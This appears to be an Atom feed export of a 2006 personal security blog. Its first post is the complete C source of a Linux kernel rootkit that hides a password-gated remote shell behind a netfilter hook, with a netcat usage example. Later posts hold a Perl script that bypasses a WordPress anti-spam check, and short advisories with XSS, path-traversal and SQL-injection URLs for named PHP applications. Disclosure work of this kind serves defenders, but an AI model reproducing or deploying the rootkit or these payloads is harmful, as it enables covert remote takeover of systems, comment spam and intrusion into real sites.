<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-25894414</id><updated>2011-12-09T03:33:37.984-08:00</updated><title type='text'>d4igoro</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>14</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-25894414.post-116077819201596027</id><published>2006-10-13T15:20:00.000-07:00</published><updated>2006-10-13T15:23:12.026-07:00</updated><title type='text'>rockprincess rootkit</title><content type='html'>/*&lt;br /&gt; * rprk 0.1 - a simple rootkit for linux 2.6&lt;br /&gt; *&lt;br /&gt; * this programm is only for education purposes designed,&lt;br /&gt; * you are _not_ allowed to distribute this programm.&lt;br /&gt; *&lt;br /&gt; * usage:&lt;br /&gt; * compile the module for you target hosts kernel.&lt;br /&gt; * load the module with the parameters "password" and "listen_port",&lt;br /&gt; * e.g: insmod rprk.ko password=lamo listen_port=5555&lt;br /&gt; * now you can control the target host.&lt;br /&gt; * the rootkit even bypasses linux's netfilter.&lt;br /&gt; * e.g: echo "lamotouch /rp_was_here"|netcat -u target.host.com 5555&lt;br /&gt; * this will execute the command "touch /rp_was_here" on target.host.com.&lt;br /&gt; *&lt;br /&gt; */&lt;br /&gt;&lt;br /&gt;#include &lt;linux/config.h&gt;&lt;br /&gt;#include &lt;linux/module.h&gt;&lt;br /&gt;#include &lt;linux/moduleparam.h&gt;&lt;br /&gt;#include &lt;linux/kmod.h&gt;&lt;br /&gt;#include &lt;linux/vmalloc.h&gt;&lt;br /&gt;#include &lt;linux/netfilter.h&gt;&lt;br /&gt;#include &lt;linux/netfilter_ipv4.h&gt;&lt;br /&gt;#include &lt;linux/in.h&gt;&lt;br /&gt;#include &lt;linux/ip.h&gt;&lt;br /&gt;#include &lt;linux/udp.h&gt;&lt;br /&gt;#include &lt;linux/string.h&gt;&lt;br /&gt;#include &lt;linux/workqueue.h&gt;&lt;br /&gt;&lt;br /&gt;struct exec_work {&lt;br /&gt; struct work_struct work;&lt;br /&gt; char *command;&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;static char password[256];&lt;br /&gt;static char clisten_port[17];&lt;br /&gt;static long listen_port;&lt;br /&gt;&lt;br /&gt;static void exec_func(void *data)&lt;br /&gt;{&lt;br /&gt; struct exec_work *exec_work = data;&lt;br /&gt; char *argv[] = { "/bin/sh", "-c", exec_work-&gt;command, NULL };&lt;br /&gt; static char *envp[] = { "HOME=/", "TERM=linux",&lt;br /&gt;  "PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };&lt;br /&gt;&lt;br /&gt; call_usermodehelper("/bin/sh", argv, envp, 0);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;module_param_string(password, password, 256, 0);&lt;br /&gt;MODULE_PARM_DESC(password, " password=secret\n");&lt;br /&gt;module_param_string(listen_port, clisten_port, 17, 0);&lt;br /&gt;MODULE_PARM_DESC(listen_port, " listen_port=6666\n");&lt;br /&gt;&lt;br /&gt;static inline int execute_command(char *cmd)&lt;br /&gt;{&lt;br /&gt; struct exec_work *exec_work;&lt;br /&gt;&lt;br /&gt; exec_work = kmalloc(sizeof(struct exec_work), GFP_ATOMIC);&lt;br /&gt; exec_work-&gt;command = kmalloc(1024 * sizeof(char), GFP_ATOMIC);&lt;br /&gt;&lt;br /&gt; INIT_WORK(&amp;exec_work-&gt;work, exec_func, exec_work);&lt;br /&gt;&lt;br /&gt; strncpy(exec_work-&gt;command, cmd, strlen(cmd) + 1);&lt;br /&gt; schedule_work(&amp;exec_work-&gt;work);&lt;br /&gt;&lt;br /&gt; return 0; &lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;static unsigned int hook_handle(unsigned int hooknum,&lt;br /&gt; struct sk_buff **skb_p,&lt;br /&gt; const struct net_device *in,&lt;br /&gt; const struct net_device *out,&lt;br /&gt; int (*okfn)(struct sk_buff *))&lt;br /&gt;{&lt;br /&gt; struct sk_buff *skb = *skb_p;&lt;br /&gt; struct iphdr *iph = skb-&gt;nh.iph;&lt;br /&gt; struct udphdr *udph = (struct udphdr *)(skb-&gt;data + iph-&gt;ihl * 4);&lt;br /&gt; unsigned int payload_offset = (iph-&gt;ihl * 4) + 8;&lt;br /&gt; char *payload = skb-&gt;data + payload_offset;&lt;br /&gt; char *sent_passwd, *sent_command;&lt;br /&gt; int i, passwdlen, sent_strlen = skb-&gt;len - payload_offset;&lt;br /&gt;&lt;br /&gt; if (iph-&gt;protocol != IPPROTO_UDP)&lt;br /&gt;  goto out;&lt;br /&gt;&lt;br /&gt; if(!(ntohs(udph-&gt;dest) == listen_port))&lt;br /&gt;  goto out;&lt;br /&gt;&lt;br /&gt; if(sent_strlen &gt; 1024)&lt;br /&gt;  sent_strlen = 1024;&lt;br /&gt;&lt;br /&gt; passwdlen = strlen(password);&lt;br /&gt;&lt;br /&gt; if(sent_strlen &lt; 1 || sent_strlen &lt; passwdlen)&lt;br /&gt;  goto out;&lt;br /&gt;&lt;br /&gt; if(!(sent_passwd = kmalloc(passwdlen * sizeof(char) + 1, GFP_ATOMIC)))&lt;br /&gt;  goto out1;&lt;br /&gt;&lt;br /&gt; if(!(sent_command = kmalloc((sent_strlen - passwdlen) * sizeof(char) + 1, GFP_ATOMIC)))&lt;br /&gt;  goto out0;&lt;br /&gt;&lt;br /&gt; for (i = 0; i &lt; passwdlen; i++)&lt;br /&gt;  sent_passwd[i] = payload[i];&lt;br /&gt; for (i = 0 ; i &lt; sent_strlen - passwdlen; i++){&lt;br /&gt;  if(payload[i + passwdlen] == '\n'){&lt;br /&gt;   sent_command[i] = '\0';&lt;br /&gt;   break;&lt;br /&gt;  }&lt;br /&gt;  sent_command[i] = payload[i + passwdlen];&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; if(strncmp(sent_passwd, password, passwdlen) == 0){&lt;br /&gt;  execute_command(sent_command);&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;out0:&lt;br /&gt; kfree(sent_command);&lt;br /&gt;out1:&lt;br /&gt; kfree(sent_passwd);&lt;br /&gt;out:&lt;br /&gt; return NF_ACCEPT;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;static struct nf_hook_ops rprk_ops = {&lt;br /&gt; .hook   = hook_handle,&lt;br /&gt; .owner  = THIS_MODULE,&lt;br /&gt; .pf     = PF_INET,&lt;br /&gt; .hooknum  = NF_IP_LOCAL_IN,&lt;br /&gt; .priority = NF_IP_PRI_FIRST&lt;br /&gt;};&lt;br /&gt;&lt;br /&gt;static int __init init(void)&lt;br /&gt;{&lt;br /&gt; int err;&lt;br /&gt;&lt;br /&gt; listen_port = simple_strtol(clisten_port, NULL, 0);&lt;br /&gt; &lt;br /&gt; if(!password)&lt;br /&gt;  return 1;&lt;br /&gt; if(!(listen_port &gt; 0 &amp;&amp; listen_port &lt; 65536))&lt;br /&gt;  return 1;&lt;br /&gt;&lt;br /&gt; err = nf_register_hook(&amp;rprk_ops);&lt;br /&gt; if(err &lt; 0)&lt;br /&gt;  return err;&lt;br /&gt;&lt;br /&gt; return 0;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;static void __exit fini(void)&lt;br /&gt;{&lt;br /&gt; nf_unregister_hook(&amp;rprk_ops);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;module_init(init);&lt;br /&gt;module_exit(fini);&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-116077819201596027?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/116077819201596027/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=116077819201596027' title='21 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/116077819201596027'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/116077819201596027'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/10/rockprincess-rootkit.html' title='rockprincess rootkit'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>21</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-115232298954836051</id><published>2006-07-07T18:41:00.000-07:00</published><updated>2006-07-07T18:50:43.303-07:00</updated><title type='text'>Math Comment Spam Protection Plugin - by-pass</title><content type='html'>wordpress plugin against spam (@ Michael Woehrer)&lt;br /&gt;-&gt; http://sw-guide.de/wordpress/math-comment-spam-protection-plugin/&lt;br /&gt;&lt;br /&gt;easy to by-pass you must only send $mathuseranswer + $mathresult with any validate value.&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;#!/usr/bin/perl -w&lt;br /&gt;&lt;br /&gt;use HTTP::Request::Common qw(POST);&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;use strict;&lt;br /&gt; &lt;br /&gt;# mathuseranswer 9+5 14&lt;br /&gt;# mathresult 59568733&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;my $url = 'http://localhost/wordpress/wp-comments-post.php';&lt;br /&gt; &lt;br /&gt;my $req = POST $url,&lt;br /&gt;            [ &lt;br /&gt;              comment_post_ID =&gt; '3',&lt;br /&gt;              author   =&gt; 'spam',&lt;br /&gt;              email    =&gt; 'more\@spam.com',&lt;br /&gt;              comment =&gt; 'spammm2',&lt;br /&gt;              mathuseranswer =&gt; '14',&lt;br /&gt;              mathresult =&gt; '59568733'&lt;br /&gt;            ];&lt;br /&gt;&lt;br /&gt;print "HTTP-FullRequest-Header: \n";&lt;br /&gt;print $req-&gt;headers-&gt;as_string() , "\n";&lt;br /&gt; &lt;br /&gt;print "HTTP-FullRequest-Header-Content: \n";&lt;br /&gt;print $req-&gt;content() ,"\n";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;my $ua = LWP::UserAgent-&gt;new();&lt;br /&gt; &lt;br /&gt;my $response = $ua-&gt;request($req);&lt;br /&gt; &lt;br /&gt;if ( $response-&gt;is_error() ) {&lt;br /&gt;        print "Error-Code    : ", $response-&gt;code() ,    "\n";&lt;br /&gt;        print "Fehlermeldung:  ", $response-&gt;message() , "\n";&lt;br /&gt;}&lt;br /&gt;else {&lt;br /&gt;        print $response-&gt;content() , "\n";&lt;br /&gt;}&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-115232298954836051?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/115232298954836051/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=115232298954836051' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/115232298954836051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/115232298954836051'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/07/math-comment-spam-protection-plugin-by.html' title='Math Comment Spam Protection Plugin - by-pass'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114685536613938131</id><published>2006-05-05T11:47:00.000-07:00</published><updated>2006-05-05T11:56:41.873-07:00</updated><title type='text'>(c)2005-Comments-Script - XSS Vulnerability</title><content type='html'>&lt;code&gt;&lt;br /&gt;(c)2005-Comments-Script - XSS Vulnerability&lt;br /&gt;--------------------------------------------------------&lt;br /&gt;Software: (c)2005-Comments-Script&lt;br /&gt;Version:&lt;br /&gt;Type: XSS Vulnerability&lt;br /&gt;Date: Mai 5 20:45:53 CEST 2006&lt;br /&gt;Vendor: Www.Goël.Ch&lt;br /&gt;Page: http://xn--gol-kma.ch&lt;br /&gt;Risc: low&lt;br /&gt;&lt;br /&gt;credits:&lt;br /&gt;----------------------------&lt;br /&gt;d4igoro - d4igoro[at]gmail[dot]com&lt;br /&gt;http://d4igoro.blogspot.com/&lt;br /&gt;&lt;br /&gt;vulnerability:&lt;br /&gt;----------------------------&lt;br /&gt;http://[target]/kommentar.php?id=[XSS]&lt;br /&gt;&lt;br /&gt;solution:&lt;br /&gt;----------------------------&lt;br /&gt;validate $id&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;notes:&lt;br /&gt;----------------------------&lt;br /&gt;The vendor has been informed.&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114685536613938131?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114685536613938131/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114685536613938131' title='15 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114685536613938131'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114685536613938131'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/05/c2005-comments-script-xss.html' title='(c)2005-Comments-Script - XSS Vulnerability'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>15</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114685136935371489</id><published>2006-05-05T10:43:00.000-07:00</published><updated>2006-05-05T11:27:41.383-07:00</updated><title type='text'>Dynamic Galerie 1.0 - path traversal + XSS Vulnerability</title><content type='html'>&lt;code&gt;&lt;br /&gt;Dynamic Galerie 1.0 - path traversal + XSS Vulnerability&lt;br /&gt;--------------------------------------------------------&lt;br /&gt;Software: Dynamic Galerie&lt;br /&gt;Version: 1.0&lt;br /&gt;Type: path traversal + XSS Vulnerability&lt;br /&gt;Date: Mai  5 19:45:53 CEST 2006&lt;br /&gt;Vendor: timo braun&lt;br /&gt;Page: http://www.timobraun.de/&lt;br /&gt;Risc: middle&lt;br /&gt;&lt;br /&gt;credits:&lt;br /&gt;----------------------------&lt;br /&gt;d4igoro - d4igoro[at]gmail[dot]com&lt;br /&gt;http://d4igoro.blogspot.com/&lt;br /&gt;&lt;br /&gt;vulnerability:&lt;br /&gt;----------------------------&lt;br /&gt;http://[target]/index.php?pfad=/tmp/&lt;br /&gt;http://[target]/galerie.php?pfad=/home/&lt;br /&gt;&lt;br /&gt;http://[target]/index.php?pfad=[XSS]&lt;br /&gt;http://[target]/galerie.php?id=[XSS]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;solution:&lt;br /&gt;----------------------------&lt;br /&gt;validate $pfad, $id&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;notes:&lt;br /&gt;----------------------------&lt;br /&gt;The vendor has been informed.&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114685136935371489?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114685136935371489/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114685136935371489' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114685136935371489'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114685136935371489'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/05/dynamic-galerie-10-path-traversal-xss.html' title='Dynamic Galerie 1.0 - path traversal + XSS Vulnerability'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114661306939765843</id><published>2006-05-02T16:28:00.000-07:00</published><updated>2006-05-02T16:43:01.873-07:00</updated><title type='text'>321soft PhP Gallery 0.9 - directory travel &amp; XSS</title><content type='html'>&lt;code&gt;&lt;br /&gt;321soft PhP Gallery 0.9 - directory travel &amp; XSS&lt;br /&gt;--------------------------------------------------------&lt;br /&gt;Software: 321soft PhP Gallery&lt;br /&gt;Version: 0.9&lt;br /&gt;Type: directory travel &amp; XSS&lt;br /&gt;Date: Mai 3 01:38:04 CEST 2006&lt;br /&gt;Vendor: 321soft.de&lt;br /&gt;Page: http://321soft.de/&lt;br /&gt;Risc: Middle&lt;br /&gt;&lt;br /&gt;credits:&lt;br /&gt;----------------------------&lt;br /&gt;d4igoro - d4igoro[at]gmail[dot]com&lt;br /&gt;http://d4igoro.blogspot.com/&lt;br /&gt;&lt;br /&gt;vulnerability:&lt;br /&gt;----------------------------&lt;br /&gt;http://[target]/index.php?path=/etc&lt;br /&gt;http://[target]/index.php?path=/tmp&lt;br /&gt;&lt;br /&gt;http://[target]/index.php?path=[XSS]&lt;br /&gt;&lt;br /&gt;solution:&lt;br /&gt;----------------------------&lt;br /&gt;index.php&lt;br /&gt;fix $path&lt;br /&gt;&lt;br /&gt;notes:&lt;br /&gt;----------------------------&lt;br /&gt;The vendor has been informed.&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114661306939765843?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114661306939765843/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114661306939765843' title='94 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114661306939765843'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114661306939765843'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html' title='321soft PhP Gallery 0.9 - directory travel &amp; XSS'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>94</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114661017477486717</id><published>2006-05-02T15:39:00.000-07:00</published><updated>2006-05-02T16:03:09.100-07:00</updated><title type='text'>PHP Linkliste 1.0b - XSS</title><content type='html'>&lt;code&gt;&lt;br /&gt;Linpha - XSS Vulnerabilities&lt;br /&gt;--------------------------------------------------------&lt;br /&gt;Software: PHP Linkliste&lt;br /&gt;Version: 1.0b&lt;br /&gt;Type: Cross Site Scripting Vulnerability&lt;br /&gt;Date: Wed Mai 3 00:45:02 CEST 2006&lt;br /&gt;Vendor: php design x&lt;br /&gt;Page: http://www.php-designx.de&lt;br /&gt;Risc: middle&lt;br /&gt;&lt;br /&gt;credits:&lt;br /&gt;----------------------------&lt;br /&gt;d4igoro - d4igoro[at]gmail[dot]com&lt;br /&gt;http://d4igoro.blogspot.com/&lt;br /&gt;&lt;br /&gt;vulnerability:&lt;br /&gt;----------------------------&lt;br /&gt;http://[target]/links.php?new_input=[XSS]&amp;new_url=[XSS]&amp;new_name=[XSS]&lt;br /&gt;the content is written in links.dat which have chmod 777 (readme)&lt;br /&gt;&lt;br /&gt;solution:&lt;br /&gt;----------------------------&lt;br /&gt;validate in links.php all formfields.&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114661017477486717?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114661017477486717/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114661017477486717' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114661017477486717'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114661017477486717'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/05/php-linkliste-10b-xss.html' title='PHP Linkliste 1.0b - XSS'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114660617082974328</id><published>2006-05-02T14:35:00.000-07:00</published><updated>2006-05-03T08:21:02.240-07:00</updated><title type='text'>PHPKB Knowledge Base - XSS</title><content type='html'>&lt;code&gt;&lt;br /&gt;http://www.knowledgebase-script.com/demo/search.php?searchkeyword=[XSS]&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;update:&lt;br /&gt;the vendor have informed me that there is no hole.&lt;br /&gt;i only had a look on the online demo. if you want you can send me a fullversion. :)&lt;br /&gt;&lt;br /&gt;and sorry guys i didnt post it to http://secunia.com/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114660617082974328?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114660617082974328/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114660617082974328' title='40 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114660617082974328'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114660617082974328'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/05/phpkb-knowledge-base-xss.html' title='PHPKB Knowledge Base - XSS'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>40</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114648697638210740</id><published>2006-05-01T05:35:00.000-07:00</published><updated>2006-05-01T05:38:43.020-07:00</updated><title type='text'>myvideo.de Xss</title><content type='html'>&lt;code&gt;&lt;br /&gt;myvideo.de is a new site for free-video-hosting.&lt;br /&gt;&lt;br /&gt;in all formfields i saw, it was possible to include javascript-code.&lt;br /&gt;the use unsecure-cookies, so it is easy to steal them and login as another person.&lt;br /&gt;&lt;br /&gt;examples:&lt;br /&gt;&lt;br /&gt;http://www.myvideo.de/watch/xy (comment-box)&lt;br /&gt;http://www.myvideo.de/online/page.php?P=xy&amp;U_ID=xy (profil)&lt;br /&gt;http://www.myvideo.de/online/page.php?P=xy&amp;volltext=[XSS]&amp;Submit=Suche (search-box)&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114648697638210740?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114648697638210740/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114648697638210740' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114648697638210740'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114648697638210740'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/05/myvideode-xss.html' title='myvideo.de Xss'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114530776788700532</id><published>2006-04-17T14:02:00.000-07:00</published><updated>2006-04-17T14:02:47.896-07:00</updated><title type='text'>Linpha - XSS Vulnerabilities</title><content type='html'>&lt;code&gt;&lt;br /&gt;Linpha - XSS Vulnerabilities&lt;br /&gt;--------------------------------------------------------&lt;br /&gt;Software: Linpha&lt;br /&gt;Version: 1.1.0&lt;br /&gt;Type: Cross Site Scripting Vulnerability&lt;br /&gt;Date: Mon Apr 17 22:59:39 CEST 2006&lt;br /&gt;Vendor: The LinPHA developers&lt;br /&gt;Page: http://linpha.sourceforge.net/&lt;br /&gt;Risc: Low&lt;br /&gt;&lt;br /&gt;credits:&lt;br /&gt;----------------------------&lt;br /&gt;d4igoro - d4igoro[at]gmail[dot]com&lt;br /&gt;http://d4igoro.blogspot.com/&lt;br /&gt;Greetz: karambole&lt;br /&gt;&lt;br /&gt;vulnerability:&lt;br /&gt;----------------------------&lt;br /&gt;http://[target]/plugins/stats/stats_view.php?date_from=[XSS]&lt;br /&gt;http://[target]/plugins/stats/stats_view.php?date_to=[XSS]&lt;br /&gt;http://[target]/plugins/stats/stats_view.php?date=[XSS]&lt;br /&gt;&lt;br /&gt;notes:&lt;br /&gt;----------------------------&lt;br /&gt;The vendor has been informed.&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/25894414-114530776788700532?l=d4igoro.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d4igoro.blogspot.com/feeds/114530776788700532/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=25894414&amp;postID=114530776788700532' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114530776788700532'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/25894414/posts/default/114530776788700532'/><link rel='alternate' type='text/html' href='http://d4igoro.blogspot.com/2006/04/linpha-xss-vulnerabilities.html' title='Linpha - XSS Vulnerabilities'/><author><name>d4igoro</name><uri>http://www.blogger.com/profile/16525130417397597702</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='19' height='32' src='http://photos1.blogger.com/blogger/6629/2654/320/lonewo04.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-25894414.post-114496452639280500</id><published>2006-04-13T14:41:00.000-07:00</published><updated>2006-04-13T14:42:44.800-07:00</updated><title type='text'>PowerClan 1.14 - SQL Injection</title><content type='html'>&lt;code&gt;&lt;br /&gt;PowerClan 1.14 - SQL Injection&lt;br /&gt;--------------------------------------------------------&lt;br /&gt;Software: PowerClan 1.14&lt;br /&gt;Version: 1.14&lt;br /&gt;Type:  SQL Injection&lt;br /&gt;Date: Apr 13 23:37:50 CEST 2006&lt;br /&gt;Vendor: powerscripts.org&lt;br /&gt;Page: http://www.powerscripts.org&lt;br /&gt;Risc: Middle&lt;br /&gt;&lt;br /&gt;credits:&lt;br /&gt;----------------------------&lt;br /&gt;d4igoro - d4igoro[at]gmail[dot]com&lt;br /&gt;http://d4igoro.blogspot.com/&lt;br /&gt;&lt;br /&gt;vulnerability:&lt;br /&gt;----------------------------&lt;br /&gt;magic_quotes_gpc = off&lt;br /&gt;http://[target]/member.php?pcpage=showmember&amp;memberid=[SQL]&lt;br /&gt;&lt;br /&gt;solution:&lt;br /&gt;----------------------------&lt;br /&gt;member.php&lt;br /&gt;fix $memberid&lt;br /&gt;&lt;br 